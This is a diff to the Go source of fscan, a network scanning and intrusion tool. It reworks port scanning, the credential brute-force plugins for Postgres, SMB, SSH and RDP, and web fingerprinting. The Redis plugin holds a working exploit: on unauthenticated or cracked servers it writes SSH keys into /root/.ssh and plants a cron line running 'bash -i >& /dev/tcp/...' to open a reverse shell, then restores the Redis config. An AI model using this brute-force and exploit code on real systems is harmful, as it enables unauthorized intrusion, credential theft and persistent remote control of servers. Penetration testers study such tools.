-				AliveAddress = append(AliveAddress, aliveAdd...)
-				mutex.Unlock()
+
+	//接收结果
+	go func() {
+		for found := range results {
+			AliveAddress = append(AliveAddress, found)
+			wg.Done()
+		}
+	}()
+
+	//多线程扫描
+	for i := 0; i < workers; i++ {
+		go func() {
+			for addr := range Addrs {
+				PortConnect(addr, results, timeout, &wg)
+				wg.Done()
 			}
-			<-limiter
-		}(host)
+		}()
+	}
+
+	//添加扫描目标
+	for _, port := range probePorts {
+		for _, host := range hostslist {
+			wg.Add(1)
+			Addrs <- Addr{host, port}
+		}
 	}
 	wg.Wait()
+	close(Addrs)
+	close(results)
 	return AliveAddress
 }
+
+func PortConnect(addr Addr, respondingHosts chan<- string, adjustedTimeout int64, wg *sync.WaitGroup) {
+	host, port := addr.ip, addr.port
+	conn, err := common.WrapperTcpWithTimeout("tcp4", fmt.Sprintf("%s:%v", host, port), time.Duration(adjustedTimeout)*time.Second)
+	defer func() {
+		if conn != nil {
+			conn.Close()
+		}
+	}()
+	if err == nil {
+		address := host + ":" + strconv.Itoa(port)
+		result := fmt.Sprintf("%s open", address)
+		common.LogSuccess(result)
+		wg.Add(1)
+		respondingHosts <- address
+	}
+}
+
+func NoPortScan(hostslist []string, ports string) (AliveAddress []string) {
+	probePorts := common.ParsePort(ports)
+	noPorts := common.ParsePort(common.NoPorts)
+	if len(noPorts) > 0 {
+		temp := map[int]struct{}{}
+		for _, port := range probePorts {
+			temp[port] = struct{}{}
+		}
+
+		for _, port := range noPorts {
+			delete(temp, port)
+		}
+
+		var newDatas []int
+		for port, _ := range temp {
+			newDatas = append(newDatas, port)
+		}
+		probePorts = newDatas
+		sort.Ints(probePorts)
+	}
+	for _, port := range probePorts {
+		for _, host := range hostslist {
+			address := host + ":" + strconv.Itoa(port)
+			AliveAddress = append(AliveAddress, address)
+		}
+	}
+	return
+}
--- a/Plugins/postgres.go
+++ b/Plugins/postgres.go
@@ -10,6 +10,10 @@ import (
 )

 func PostgresScan(info *common.HostInfo) (tmperr error) {
+	if common.IsBrute {
+		return
+	}
+	starttime := time.Now().Unix()
 	for _, user := range common.Userdict["postgresql"] {
 		for _, pass := range common.Passwords {
 			pass = strings.Replace(pass, "{user}", string(user), -1)
@@ -17,9 +21,15 @@ func PostgresScan(info *common.HostInfo) (tmperr error) {
 			if flag == true && err == nil {
 				return err
 			} else {
-				errlog := fmt.Sprintf("[-] psql %v %v %v %v %v", info.Host, common.PORTList["psql"], user, pass, err)
+				errlog := fmt.Sprintf("[-] psql %v:%v %v %v %v", info.Host, info.Ports, user, pass, err)
 				common.LogError(errlog)
 				tmperr = err
+				if common.CheckErrs(err) {
+					return err
+				}
+				if time.Now().Unix()-starttime > (int64(len(common.Userdict["postgresql"])*len(common.Passwords)) * common.Timeout) {
+					return err
+				}
 			}
 		}
 	}
@@ -28,15 +38,15 @@ func PostgresScan(info *common.HostInfo) (tmperr error) {

 func PostgresConn(info *common.HostInfo, user string, pass string) (flag bool, err error) {
 	flag = false
-	Host, Port, Username, Password := info.Host, common.PORTList["psql"], user, pass
+	Host, Port, Username, Password := info.Host, info.Ports, user, pass
 	dataSourceName := fmt.Sprintf("postgres://%v:%v@%v:%v/%v?sslmode=%v", Username, Password, Host, Port, "postgres", "disable")
-	db, err := sql.Open("mysql", dataSourceName)
+	db, err := sql.Open("postgres", dataSourceName)
 	if err == nil {
-		db.SetConnMaxLifetime(time.Duration(info.Timeout) * time.Second)
+		db.SetConnMaxLifetime(time.Duration(common.Timeout) * time.Second)
 		defer db.Close()
 		err = db.Ping()
 		if err == nil {
-			result := fmt.Sprintf("Postgres:%v:%v:%v %v", Host, Port, Username, Password)
+			result := fmt.Sprintf("[+] Postgres:%v:%v:%v %v", Host, Port, Username, Password)
 			common.LogSuccess(result)
 			flag = true
 		}
--- a/Plugins/rdp.go
+++ b/Plugins/rdp.go
@@ -0,0 +1,197 @@
+package Plugins
+
+import (
+	"errors"
+	"fmt"
+	"github.com/shadow1ng/fscan/common"
+	"github.com/tomatome/grdp/core"
+	"github.com/tomatome/grdp/glog"
+	"github.com/tomatome/grdp/protocol/nla"
+	"github.com/tomatome/grdp/protocol/pdu"
+	"github.com/tomatome/grdp/protocol/rfb"
+	"github.com/tomatome/grdp/protocol/sec"
+	"github.com/tomatome/grdp/protocol/t125"
+	"github.com/tomatome/grdp/protocol/tpkt"
+	"github.com/tomatome/grdp/protocol/x224"
+	"log"
+	"os"
+	"strconv"
+	"strings"
+	"sync"
+	"time"
+)
+
+type Brutelist struct {
+	user string
+	pass string
+}
+
+func RdpScan(info *common.HostInfo) (tmperr error) {
+	if common.IsBrute {
+		return
+	}
+
+	var wg sync.WaitGroup
+	var signal bool
+	var num = 0
+	var all = len(common.Userdict["rdp"]) * len(common.Passwords)
+	var mutex sync.Mutex
+	brlist := make(chan Brutelist, all)
+	port, _ := strconv.Atoi(info.Ports)
+
+	for _, user := range common.Userdict["rdp"] {
+		for _, pass := range common.Passwords {
+			pass = strings.Replace(pass, "{user}", user, -1)
+			brlist <- Brutelist{user, pass}
+		}
+	}
+
+	for i := 0; i < common.BruteThread; i++ {
+		wg.Add(1)
+		go worker(info.Host, common.Domain, port, &wg, brlist, &signal, &num, all, &mutex, common.Timeout)
+	}
+
+	close(brlist)
+	go func() {
+		wg.Wait()
+		signal = true
+	}()
+	for !signal {
+	}
+
+	return tmperr
+}
+
+func worker(host, domain string, port int, wg *sync.WaitGroup, brlist chan Brutelist, signal *bool, num *int, all int, mutex *sync.Mutex, timeout int64) {
+	defer wg.Done()
+	for one := range brlist {
+		if *signal == true {
+			return
+		}
+		go incrNum(num, mutex)
+		user, pass := one.user, one.pass
+		flag, err := RdpConn(host, domain, user, pass, port, timeout)
+		if flag == true && err == nil {
+			var result string
+			if domain != "" {
+				result = fmt.Sprintf("[+] RDP:%v:%v:%v\\%v %v", host, port, domain, user, pass)
+			} else {
+				result = fmt.Sprintf("[+] RDP:%v:%v:%v %v", host, port, user, pass)
+			}
+			common.LogSuccess(result)
+			*signal = true
+			return
+		} else {
+			errlog := fmt.Sprintf("[-] (%v/%v) rdp %v:%v %v %v %v", *num, all, host, port, user, pass, err)
+			common.LogError(errlog)
+		}
+	}
+}
+
+func incrNum(num *int, mutex *sync.Mutex) {
+	mutex.Lock()
+	*num = *num + 1
+	mutex.Unlock()
+}
+
+func RdpConn(ip, domain, user, password string, port int, timeout int64) (bool, error) {
+	target := fmt.Sprintf("%s:%d", ip, port)
+	g := NewClient(target, glog.NONE)
+	err := g.Login(domain, user, password, timeout)
+
+	if err == nil {
+		return true, nil
+	}
+
+	return false, err
+}
+
+type Client struct {
+	Host string // ip:port
+	tpkt *tpkt.TPKT
+	x224 *x224.X224
+	mcs  *t125.MCSClient
+	sec  *sec.Client
+	pdu  *pdu.Client
+	vnc  *rfb.RFB
+}
+
+func NewClient(host string, logLevel glog.LEVEL) *Client {
+	glog.SetLevel(logLevel)
+	logger := log.New(os.Stdout, "", 0)
+	glog.SetLogger(logger)
+	return &Client{
+		Host: host,
+	}
+}
+
+func (g *Client) Login(domain, user, pwd string, timeout int64) error {
+	conn, err := common.WrapperTcpWithTimeout("tcp", g.Host, time.Duration(timeout)*time.Second)
+	defer func() {
+		if conn != nil {
+			conn.Close()
+		}
+	}()
+	if err != nil {
+		return fmt.Errorf("[dial err] %v", err)
+	}
+	glog.Info(conn.LocalAddr().String())
+
+	g.tpkt = tpkt.New(core.NewSocketLayer(conn), nla.NewNTLMv2(domain, user, pwd))
+	g.x224 = x224.New(g.tpkt)
+	g.mcs = t125.NewMCSClient(g.x224)
+	g.sec = sec.NewClient(g.mcs)
+	g.pdu = pdu.NewClient(g.sec)
+
+	g.sec.SetUser(user)
+	g.sec.SetPwd(pwd)
+	g.sec.SetDomain(domain)
+	//g.sec.SetClientAutoReconnect()
+
+	g.tpkt.SetFastPathListener(g.sec)
+	g.sec.SetFastPathListener(g.pdu)
+	g.pdu.SetFastPathSender(g.tpkt)
+
+	//g.x224.SetRequestedProtocol(x224.PROTOCOL_SSL)
+	//g.x224.SetRequestedProtocol(x224.PROTOCOL_RDP)
+
+	err = g.x224.Connect()
+	if err != nil {
+		return fmt.Errorf("[x224 connect err] %v", err)
+	}
+	glog.Info("wait connect ok")
+	wg := &sync.WaitGroup{}
+	breakFlag := false
+	wg.Add(1)
+
+	g.pdu.On("error", func(e error) {
+		err = e
+		glog.Error("error", e)
+		g.pdu.Emit("done")
+	})
+	g.pdu.On("close", func() {
+		err = errors.New("close")
+		glog.Info("on close")
+		g.pdu.Emit("done")
+	})
+	g.pdu.On("success", func() {
+		err = nil
+		glog.Info("on success")
+		g.pdu.Emit("done")
+	})
+	g.pdu.On("ready", func() {
+		glog.Info("on ready")
+		g.pdu.Emit("done")
+	})
+	g.pdu.On("update", func(rectangles []pdu.BitmapData) {
+		glog.Info("on update:", rectangles)
+	})
+	g.pdu.On("done", func() {
+		if breakFlag == false {
+			breakFlag = true
+			wg.Done()
+		}
+	})
+	wg.Wait()
+	return err
+}
--- a/Plugins/redis.go
+++ b/Plugins/redis.go
@@ -10,20 +10,35 @@ import (
 	"time"
 )

+var (
+	dbfilename string
+	dir        string
+)
+
 func RedisScan(info *common.HostInfo) (tmperr error) {
+	starttime := time.Now().Unix()
 	flag, err := RedisUnauth(info)
 	if flag == true && err == nil {
 		return err
 	}
+	if common.IsBrute {
+		return
+	}
 	for _, pass := range common.Passwords {
 		pass = strings.Replace(pass, "{user}", "redis", -1)
 		flag, err := RedisConn(info, pass)
 		if flag == true && err == nil {
 			return err
 		} else {
-			errlog := fmt.Sprintf("[-] redis %v %v %v %v %v", info.Host, common.PORTList["redis"], pass, err)
+			errlog := fmt.Sprintf("[-] redis %v:%v %v %v", info.Host, info.Ports, pass, err)
 			common.LogError(errlog)
 			tmperr = err
+			if common.CheckErrs(err) {
+				return err
+			}
+			if time.Now().Unix()-starttime > (int64(len(common.Passwords)) * common.Timeout) {
+				return err
+			}
 		}
 	}
 	return tmperr
@@ -31,12 +46,20 @@ func RedisScan(info *common.HostInfo) (tmperr error) {

 func RedisConn(info *common.HostInfo, pass string) (flag bool, err error) {
 	flag = false
-	realhost := fmt.Sprintf("%s:%d", info.Host, common.PORTList["redis"])
-	conn, err := net.DialTimeout("tcp", realhost, time.Duration(info.Timeout)*time.Second)
+	realhost := fmt.Sprintf("%s:%v", info.Host, info.Ports)
+	conn, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(common.Timeout)*time.Second)
+	defer func() {
+		if conn != nil {
+			conn.Close()
+		}
+	}()
+	if err != nil {
+		return flag, err
+	}
+	err = conn.SetReadDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second))
 	if err != nil {
 		return flag, err
 	}
-	defer conn.Close()
 	_, err = conn.Write([]byte(fmt.Sprintf("auth %s\r\n", pass)))
 	if err != nil {
 		return flag, err
@@ -46,22 +69,37 @@ func RedisConn(info *common.HostInfo, pass string) (flag bool, err error) {
 		return flag, err
 	}
 	if strings.Contains(reply, "+OK") {
-		result := fmt.Sprintf("[+] Redis:%s %s", realhost, pass)
-		common.LogSuccess(result)
 		flag = true
-		Expoilt(realhost, conn)
+		dbfilename, dir, err = getconfig(conn)
+		if err != nil {
+			result := fmt.Sprintf("[+] Redis:%s %s", realhost, pass)
+			common.LogSuccess(result)
+			return flag, err
+		} else {
+			result := fmt.Sprintf("[+] Redis:%s %s file:%s/%s", realhost, pass, dir, dbfilename)
+			common.LogSuccess(result)
+		}
+		err = Expoilt(realhost, conn)
 	}
 	return flag, err
 }

 func RedisUnauth(info *common.HostInfo) (flag bool, err error) {
 	flag = false
-	realhost := fmt.Sprintf("%s:%d", info.Host, common.PORTList["redis"])
-	conn, err := net.DialTimeout("tcp", realhost, time.Duration(info.Timeout)*time.Second)
+	realhost := fmt.Sprintf("%s:%v", info.Host, info.Ports)
+	conn, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(common.Timeout)*time.Second)
+	defer func() {
+		if conn != nil {
+			conn.Close()
+		}
+	}()
+	if err != nil {
+		return flag, err
+	}
+	err = conn.SetReadDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second))
 	if err != nil {
 		return flag, err
 	}
-	defer conn.Close()
 	_, err = conn.Write([]byte("info\r\n"))
 	if err != nil {
 		return flag, err
@@ -71,10 +109,17 @@ func RedisUnauth(info *common.HostInfo) (flag bool, err error) {
 		return flag, err
 	}
 	if strings.Contains(reply, "redis_version") {
-		result := fmt.Sprintf("[+] Redis:%s unauthorized", realhost)
-		common.LogSuccess(result)
 		flag = true
-		Expoilt(realhost, conn)
+		dbfilename, dir, err = getconfig(conn)
+		if err != nil {
+			result := fmt.Sprintf("[+] Redis:%s unauthorized", realhost)
+			common.LogSuccess(result)
+			return flag, err
+		} else {
+			result := fmt.Sprintf("[+] Redis:%s unauthorized file:%s/%s", realhost, dir, dbfilename)
+			common.LogSuccess(result)
+		}
+		err = Expoilt(realhost, conn)
 	}
 	return flag, err
 }
@@ -85,24 +130,25 @@ func Expoilt(realhost string, conn net.Conn) error {
 		return err
 	}
 	if flagSsh == true {
-		result := fmt.Sprintf("Redis:%v like can write /root/.ssh/", realhost)
+		result := fmt.Sprintf("[+] Redis:%v like can write /root/.ssh/", realhost)
 		common.LogSuccess(result)
 		if common.RedisFile != "" {
 			writeok, text, err := writekey(conn, common.RedisFile)
 			if err != nil {
+				fmt.Println(fmt.Sprintf("[-] %v SSH write key errer: %v", realhost, text))
 				return err
 			}
 			if writeok {
-				result := fmt.Sprintf("%v SSH public key was written successfully", realhost)
+				result := fmt.Sprintf("[+] %v SSH public key was written successfully", realhost)
 				common.LogSuccess(result)
 			} else {
-				fmt.Println("Redis:", realhost, "SSHPUB write failed", text)
+				fmt.Println("[-] Redis:", realhost, "SSHPUB write failed", text)
 			}
 		}
 	}

 	if flagCron == true {
-		result := fmt.Sprintf("Redis:%v like can write /var/spool/cron/", realhost)
+		result := fmt.Sprintf("[+] Redis:%v like can write /var/spool/cron/", realhost)
 		common.LogSuccess(result)
 		if common.RedisShell != "" {
 			writeok, text, err := writecron(conn, common.RedisShell)
@@ -110,13 +156,14 @@ func Expoilt(realhost string, conn net.Conn) error {
 				return err
 			}
 			if writeok {
-				result := fmt.Sprintf("%v /var/spool/cron/root was written successfully", realhost)
+				result := fmt.Sprintf("[+] %v /var/spool/cron/root was written successfully", realhost)
 				common.LogSuccess(result)
 			} else {
-				fmt.Println("Redis:", realhost, "cron write failed", text)
+				fmt.Println("[-] Redis:", realhost, "cron write failed", text)
 			}
 		}
 	}
+	err = recoverdb(dbfilename, dir, conn)
 	return err
 }

@@ -199,7 +246,11 @@ func writecron(conn net.Conn, host string) (flag bool, text string, err error) {
 			return flag, text, err
 		}
 		if strings.Contains(text, "OK") {
-			scanIp, scanPort := strings.Split(host, ":")[0], strings.Split(host, ":")[1]
+			target := strings.Split(host, ":")
+			if len(target) < 2 {
+				return flag, "host error", err
+			}
+			scanIp, scanPort := target[0], target[1]
 			_, err = conn.Write([]byte(fmt.Sprintf("set xx \"\\n* * * * * bash -i >& /dev/tcp/%v/%v 0>&1\\n\"\r\n", scanIp, scanPort)))
 			if err != nil {
 				return flag, text, err
@@ -247,14 +298,15 @@ func Readfile(filename string) (string, error) {
 }

 func readreply(conn net.Conn) (result string, err error) {
-	buf := make([]byte, 4096)
+	size := 5 * 1024
+	buf := make([]byte, size)
 	for {
 		count, err := conn.Read(buf)
 		if err != nil {
 			break
 		}
 		result += string(buf[0:count])
-		if count < 4096 {
+		if count < size {
 			break
 		}
 	}
@@ -287,3 +339,55 @@ func testwrite(conn net.Conn) (flag bool, flagCron bool, err error) {
 	}
 	return flag, flagCron, err
 }
+
+func getconfig(conn net.Conn) (dbfilename string, dir string, err error) {
+	_, err = conn.Write([]byte(fmt.Sprintf("CONFIG GET dbfilename\r\n")))
+	if err != nil {
+		return
+	}
+	text, err := readreply(conn)
+	if err != nil {
+		return
+	}
+	text1 := strings.Split(text, "\r\n")
+	if len(text1) > 2 {
+		dbfilename = text1[len(text1)-2]
+	} else {
+		dbfilename = text1[0]
+	}
+	_, err = conn.Write([]byte(fmt.Sprintf("CONFIG GET dir\r\n")))
+	if err != nil {
+		return
+	}
+	text, err = readreply(conn)
+	if err != nil {
+		return
+	}
+	text1 = strings.Split(text, "\r\n")
+	if len(text1) > 2 {
+		dir = text1[len(text1)-2]
+	} else {
+		dir = text1[0]
+	}
+	return
+}
+
+func recoverdb(dbfilename string, dir string, conn net.Conn) (err error) {
+	_, err = conn.Write([]byte(fmt.Sprintf("CONFIG SET dbfilename %s\r\n", dbfilename)))
+	if err != nil {
+		return
+	}
+	dbfilename, err = readreply(conn)
+	if err != nil {
+		return
+	}
+	_, err = conn.Write([]byte(fmt.Sprintf("CONFIG SET dir %s\r\n", dir)))
+	if err != nil {
+		return
+	}
+	dir, err = readreply(conn)
+	if err != nil {
+		return
+	}
+	return
+}
--- a/Plugins/scanner.go
+++ b/Plugins/scanner.go
@@ -3,6 +3,7 @@ package Plugins
 import (
 	"errors"
 	"fmt"
+	"github.com/shadow1ng/fscan/WebScan/lib"
 	"github.com/shadow1ng/fscan/common"
 	"reflect"
 	"strconv"
@@ -11,60 +12,90 @@ import (
 )

 func Scan(info common.HostInfo) {
-	fmt.Println("scan start")
-	Hosts, _ := common.ParseIP(info.Host, common.HostFile)
-	if common.IsPing == false {
-		Hosts = ICMPRun(Hosts, common.Ping)
-		fmt.Println("icmp alive hosts len is:", len(Hosts))
-	}
-	if info.Scantype == "icmp" {
+	fmt.Println("start infoscan")
+	Hosts, err := common.ParseIP(info.Host, common.HostFile, common.NoHosts)
+	if err != nil {
+		fmt.Println("len(hosts)==0", err)
 		return
 	}
-	AlivePorts := TCPportScan(Hosts, info.Ports, info.Timeout)
-	if info.Scantype == "portscan" {
-		return
-	}
-	var severports []string //severports := []string{"21","22","135"."445","1433","3306","5432","6379","9200","11211","27017"...}
-	for _, port := range common.PORTList {
-		severports = append(severports, strconv.Itoa(port))
-	}
+	lib.Inithttp(common.Pocinfo)
 	var ch = make(chan struct{}, common.Threads)
 	var wg = sync.WaitGroup{}
-	for _, targetIP := range AlivePorts {
-		info.Host, info.Ports = strings.Split(targetIP, ":")[0], strings.Split(targetIP, ":")[1]
-		if info.Scantype == "all" {
-			if info.Ports == "445" { //scan more vul
-				AddScan("1000001", info, ch, &wg)
-				AddScan("1000002", info, ch, &wg)
-			} else if IsContain(severports, info.Ports) {
-				AddScan(info.Ports, info, ch, &wg)
-			} else {
-				AddScan("1000003", info, ch, &wg) //webtitle
-			}
+	if len(Hosts) > 0 {
+		if common.IsPing == false {
+			Hosts = CheckLive(Hosts, common.Ping)
+			fmt.Println("[*] Icmp alive hosts len is:", len(Hosts))
+		}
+		if common.Scantype == "icmp" {
+			common.LogWG.Wait()
+			return
+		}
+		var AlivePorts []string
+		if common.Scantype == "webonly" {
+			AlivePorts = NoPortScan(Hosts, info.Ports)
 		} else {
-			port, _ := common.PortlistBack[info.Scantype]
-			scantype := strconv.Itoa(port)
-			AddScan(scantype, info, ch, &wg)
+			AlivePorts = PortScan(Hosts, info.Ports, common.Timeout)
+			fmt.Println("[*] alive ports len is:", len(AlivePorts))
+			if common.Scantype == "portscan" {
+				common.LogWG.Wait()
+				return
+			}
+		}
+
+		var severports []string //severports := []string{"21","22","135"."445","1433","3306","5432","6379","9200","11211","27017"...}
+		for _, port := range common.PORTList {
+			severports = append(severports, strconv.Itoa(port))
+		}
+		fmt.Println("start vulscan")
+		for _, targetIP := range AlivePorts {
+			info.Host, info.Ports = strings.Split(targetIP, ":")[0], strings.Split(targetIP, ":")[1]
+			if common.Scantype == "all" || common.Scantype == "main" {
+				switch {
+				case info.Ports == "135":
+					AddScan(info.Ports, info, ch, &wg) //findnet
+				case info.Ports == "445":
+					//AddScan(info.Ports, info, ch, &wg)  //smb
+					AddScan("1000001", info, ch, &wg) //ms17010
+					//AddScan("1000002", info, ch, &wg) //smbghost
+				case info.Ports == "9000":
+					AddScan(info.Ports, info, ch, &wg) //fcgiscan
+					AddScan("1000003", info, ch, &wg)  //http
+				case IsContain(severports, info.Ports):
+					AddScan(info.Ports, info, ch, &wg) //plugins scan
+				default:
+					AddScan("1000003", info, ch, &wg) //webtitle
+				}
+			} else {
+				port, _ := common.PORTList[common.Scantype]
+				scantype := strconv.Itoa(port)
+				AddScan(scantype, info, ch, &wg)
+			}
 		}
 	}
+	for _, url := range common.Urls {
+		info.Url = url
+		AddScan("1000003", info, ch, &wg)
+	}
 	wg.Wait()
-	common.WaitSave()
+	common.LogWG.Wait()
+	close(common.Results)
+	fmt.Println(fmt.Sprintf("已完成 %v/%v", common.End, common.Num))
 }

+var Mutex = &sync.Mutex{}
+
 func AddScan(scantype string, info common.HostInfo, ch chan struct{}, wg *sync.WaitGroup) {
 	wg.Add(1)
 	go func() {
-		err, _ := ScanFunc(PluginList, scantype, &info)
-		if common.LogErr {
-			tmperr := err[0].Interface()
-			if tmperr != nil {
-				tmperr1 := err[0].Interface().(error)
-				errtext := strings.Replace(tmperr1.Error(), "\n", "", -1)
-				fmt.Println("[-] ", info.Host+":"+info.Ports, errtext)
-			}
-		}
-		wg.Done()
+		Mutex.Lock()
+		common.Num += 1
+		Mutex.Unlock()
+		ScanFunc(PluginList, scantype, &info)
+		Mutex.Lock()
+		common.End += 1
+		Mutex.Unlock()
 		<-ch
+		wg.Done()
 	}()
 	ch <- struct{}{}
 }
--- a/Plugins/smb.go
+++ b/Plugins/smb.go
@@ -1,6 +1,7 @@
 package Plugins

 import (
+	"errors"
 	"fmt"
 	"github.com/shadow1ng/fscan/common"
 	"github.com/stacktitan/smb/smb"
@@ -9,30 +10,41 @@ import (
 )

 func SmbScan(info *common.HostInfo) (tmperr error) {
+	if common.IsBrute {
+		return nil
+	}
+	starttime := time.Now().Unix()
 	for _, user := range common.Userdict["smb"] {
 		for _, pass := range common.Passwords {
 			pass = strings.Replace(pass, "{user}", user, -1)
 			flag, err := doWithTimeOut(info, user, pass)
 			if flag == true && err == nil {
 				var result string
-				if info.Domain != "" {
-					result = fmt.Sprintf("SMB:%v:%v:%v\\%v %v", info.Host, info.Ports, info.Domain, user, pass)
+				if common.Domain != "" {
+					result = fmt.Sprintf("[+] SMB:%v:%v:%v\\%v %v", info.Host, info.Ports, common.Domain, user, pass)
 				} else {
-					result = fmt.Sprintf("SMB:%v:%v:%v %v", info.Host, info.Ports, user, pass)
+					result = fmt.Sprintf("[+] SMB:%v:%v:%v %v", info.Host, info.Ports, user, pass)
 				}
 				common.LogSuccess(result)
 				return err
 			} else {
-				errlog := fmt.Sprintf("[-] smb %v %v %v %v %v", info.Host, 445, user, pass, err)
+				errlog := fmt.Sprintf("[-] smb %v:%v %v %v %v", info.Host, 445, user, pass, err)
+				errlog = strings.Replace(errlog, "\n", "", -1)
 				common.LogError(errlog)
 				tmperr = err
+				if common.CheckErrs(err) {
+					return err
+				}
+				if time.Now().Unix()-starttime > (int64(len(common.Userdict["smb"])*len(common.Passwords)) * common.Timeout) {
+					return err
+				}
 			}
 		}
 	}
 	return tmperr
 }

-func SmblConn(info *common.HostInfo, user string, pass string, Domain string, signal chan struct{}) (flag bool, err error) {
+func SmblConn(info *common.HostInfo, user string, pass string, signal chan struct{}) (flag bool, err error) {
 	flag = false
 	Host, Username, Password := info.Host, user, pass
 	options := smb.Options{
@@ -40,7 +52,7 @@ func SmblConn(info *common.HostInfo, user string, pass string, Domain string, si
 		Port:        445,
 		User:        Username,
 		Password:    Password,
-		Domain:      Domain,
+		Domain:      common.Domain,
 		Workstation: "",
 	}

@@ -58,12 +70,12 @@ func SmblConn(info *common.HostInfo, user string, pass string, Domain string, si
 func doWithTimeOut(info *common.HostInfo, user string, pass string) (flag bool, err error) {
 	signal := make(chan struct{})
 	go func() {
-		flag, err = SmblConn(info, user, pass, info.Domain, signal)
+		flag, err = SmblConn(info, user, pass, signal)
 	}()
 	select {
 	case <-signal:
 		return flag, err
-	case <-time.After(time.Duration(info.Timeout) * time.Second):
-		return false, err
+	case <-time.After(time.Duration(common.Timeout) * time.Second):
+		return false, errors.New("time out")
 	}
 }
--- a/Plugins/ssh.go
+++ b/Plugins/ssh.go
@@ -1,15 +1,21 @@
 package Plugins

 import (
+	"errors"
 	"fmt"
 	"github.com/shadow1ng/fscan/common"
 	"golang.org/x/crypto/ssh"
+	"io/ioutil"
 	"net"
 	"strings"
 	"time"
 )

 func SshScan(info *common.HostInfo) (tmperr error) {
+	if common.IsBrute {
+		return
+	}
+	starttime := time.Now().Unix()
 	for _, user := range common.Userdict["ssh"] {
 		for _, pass := range common.Passwords {
 			pass = strings.Replace(pass, "{user}", user, -1)
@@ -17,9 +23,18 @@ func SshScan(info *common.HostInfo) (tmperr error) {
 			if flag == true && err == nil {
 				return err
 			} else {
-				errlog := fmt.Sprintf("[-] ssh", info.Host, common.PORTList["ssh"], user, pass, err)
+				errlog := fmt.Sprintf("[-] ssh %v:%v %v %v %v", info.Host, info.Ports, user, pass, err)
 				common.LogError(errlog)
 				tmperr = err
+				if common.CheckErrs(err) {
+					return err
+				}
+				if time.Now().Unix()-starttime > (int64(len(common.Userdict["ssh"])*len(common.Passwords)) * common.Timeout) {
+					return err
+				}
+			}
+			if common.SshKey != "" {
+				return err
 			}
 		}
 	}
@@ -28,13 +43,26 @@ func SshScan(info *common.HostInfo) (tmperr error) {

 func SshConn(info *common.HostInfo, user string, pass string) (flag bool, err error) {
 	flag = false
-	Host, Port, Username, Password := info.Host, common.PORTList["ssh"], user, pass
+	Host, Port, Username, Password := info.Host, info.Ports, user, pass
+	Auth := []ssh.AuthMethod{}
+	if common.SshKey != "" {
+		pemBytes, err := ioutil.ReadFile(common.SshKey)
+		if err != nil {
+			return false, errors.New("read key failed" + err.Error())
+		}
+		signer, err := ssh.ParsePrivateKey(pemBytes)
+		if err != nil {
+			return false, errors.New("parse key failed" + err.Error())
+		}
+		Auth = []ssh.AuthMethod{ssh.PublicKeys(signer)}
+	} else {
+		Auth = []ssh.AuthMethod{ssh.Password(Password)}
+	}
+
 	config := &ssh.ClientConfig{
-		User: Username,
-		Auth: []ssh.AuthMethod{
-			ssh.Password(Password),
-		},
-		Timeout: time.Duration(info.Timeout) * time.Second,
+		User:    Username,
+		Auth:    Auth,
+		Timeout: time.Duration(common.Timeout) * time.Second,
 		HostKeyCallback: func(hostname string, remote net.Addr, key ssh.PublicKey) error {
 			return nil
 		},
@@ -47,12 +75,19 @@ func SshConn(info *common.HostInfo, user string, pass string) (flag bool, err er
 		if err == nil {
 			defer session.Close()
 			flag = true
-			if info.Command != "" {
-				combo, _ := session.CombinedOutput(info.Command)
-				result := fmt.Sprintf("SSH:%v:%v:%v %v \n %v", Host, Port, Username, Password, string(combo))
+			var result string
+			if common.Command != "" {
+				combo, _ := session.CombinedOutput(common.Command)
+				result = fmt.Sprintf("[+] SSH:%v:%v:%v %v \n %v", Host, Port, Username, Password, string(combo))
+				if common.SshKey != "" {
+					result = fmt.Sprintf("[+] SSH:%v:%v sshkey correct \n %v", Host, Port, string(combo))
+				}
 				common.LogSuccess(result)
 			} else {
-				result := fmt.Sprintf("[+] SSH:%v:%v:%v %v", Host, Port, Username, Password)
+				result = fmt.Sprintf("[+] SSH:%v:%v:%v %v", Host, Port, Username, Password)
+				if common.SshKey != "" {
+					result = fmt.Sprintf("[+] SSH:%v:%v sshkey correct", Host, Port)
+				}
 				common.LogSuccess(result)
 			}
 		}
--- a/Plugins/webtitle.go
+++ b/Plugins/webtitle.go
@@ -1,90 +1,242 @@
 package Plugins

 import (
+	"compress/gzip"
 	"crypto/tls"
 	"fmt"
 	"github.com/shadow1ng/fscan/WebScan"
+	"github.com/shadow1ng/fscan/WebScan/lib"
 	"github.com/shadow1ng/fscan/common"
+	"golang.org/x/text/encoding/simplifiedchinese"
+	"io"
 	"io/ioutil"
-	"net"
 	"net/http"
+	"net/url"
 	"regexp"
 	"strings"
 	"time"
+	"unicode/utf8"
 )

-func WebTitle(info *common.HostInfo) (err error, result string) {
-	if info.Ports == "80" {
-		info.Url = fmt.Sprintf("http://%s", info.Host)
-	} else if info.Ports == "443" {
-		info.Url = fmt.Sprintf("https://%s", info.Host)
+func WebTitle(info *common.HostInfo) error {
+	err, CheckData := GOWebTitle(info)
+	info.Infostr = WebScan.InfoCheck(info.Url, &CheckData)
+	if common.IsWebCan == false && common.IsBrute == false && err == nil {
+		WebScan.WebScan(info)
 	} else {
-		info.Url = fmt.Sprintf("http://%s:%s", info.Host, info.Ports)
+		errlog := fmt.Sprintf("[-] webtitle %v %v", info.Url, err)
+		common.LogError(errlog)
+	}
+	return err
+}
+func GOWebTitle(info *common.HostInfo) (err error, CheckData []WebScan.CheckDatas) {
+	if info.Url == "" {
+		switch info.Ports {
+		case "80":
+			info.Url = fmt.Sprintf("http://%s", info.Host)
+		case "443":
+			info.Url = fmt.Sprintf("https://%s", info.Host)
+		default:
+			host := fmt.Sprintf("%s:%s", info.Host, info.Ports)
+			protocol := GetProtocol(host, common.Timeout)
+			info.Url = fmt.Sprintf("%s://%s:%s", protocol, info.Host, info.Ports)
+		}
+	} else {
+		if !strings.Contains(info.Url, "://") {
+			host := strings.Split(info.Url, "/")[0]
+			protocol := GetProtocol(host, common.Timeout)
+			info.Url = fmt.Sprintf("%s://%s", protocol, info.Url)
+		}
 	}

-	err, result = geturl(info)
-	if common.IsWebCan || err != nil {
+	err, result, CheckData := geturl(info, 1, CheckData)
+	if err != nil && !strings.Contains(err.Error(), "EOF") {
 		return
 	}

-	if result == "https" {
-		err, result = geturl(info)
+	//有跳转
+	if strings.Contains(result, "://") {
+		info.Url = result
+		err, result, CheckData = geturl(info, 3, CheckData)
+		if err != nil {
+			return
+		}
